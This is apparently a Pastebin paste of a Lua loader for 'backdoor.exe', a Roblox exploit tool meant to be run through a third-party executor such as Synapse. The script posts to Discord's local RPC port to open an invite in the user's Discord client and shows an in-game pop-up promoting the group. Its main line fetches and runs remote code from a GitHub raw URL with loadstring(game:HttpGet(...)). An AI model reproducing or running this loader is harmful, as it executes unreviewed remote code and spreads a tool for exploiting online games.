tubers93zxzxz

backdoor.exe

Feb 12th, 2023
182
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.18 KB | None | 0 0
  1. local httpService = game:GetService("HttpService");
  2.  
  3. local invCode = "xJHCqm84cW";
  4. local httpRequest = (syn and syn.request) or http_request or function() end;
  5.  
  6. local function launchDiscord()
  7. if not httpRequest then warn("Exploit not supported. No HTTP found.") return end
  8.  
  9. httpRequest({
  10. Url = "http://127.0.0.1:6463/rpc?v=1",
  11. Method = "POST",
  12.  
  13. Headers = {
  14. ['Content-Type'] = 'application/json',
  15. Origin = 'https://discord.com'
  16. },
  17.  
  18. Body = httpService:JSONEncode({
  19. cmd = 'INVITE_BROWSER',
  20. nonce = httpService:GenerateGUID(false),
  21. args = {code = invCode}
  22. })
  23. })
  24. end;
  25.  
  26. local NotificationBindable = Instance.new("BindableFunction")
  27. NotificationBindable.OnInvoke = launchDiscord
  28.  
  29. game:GetService("StarterGui"):SetCore(
  30. "SendNotification",
  31. {
  32. Title = "backdoor.exe",
  33. Duration = 5,
  34. Text = "Loading lastest version!\n\nJoin our Discord for games, scripts and more",
  35. Button1 = "Join Discord!",
  36. Callback = NotificationBindable
  37. }
  38. )
  39.  
  40. loadstring(game:HttpGet("https://raw.githubusercontent.com/iK4oS/backdoor.exe/v8/src/main.lua"))();
  41.  
  42.  
  43.  
  44. -- k4scripts
  45. -- .------.
  46. -- |4.--. |
  47. -- | :│/: |
  48. -- | :│\: |
  49. -- | '--'4|
  50. -- `------'
  51.  
Add Comment
Please, Sign In to add comment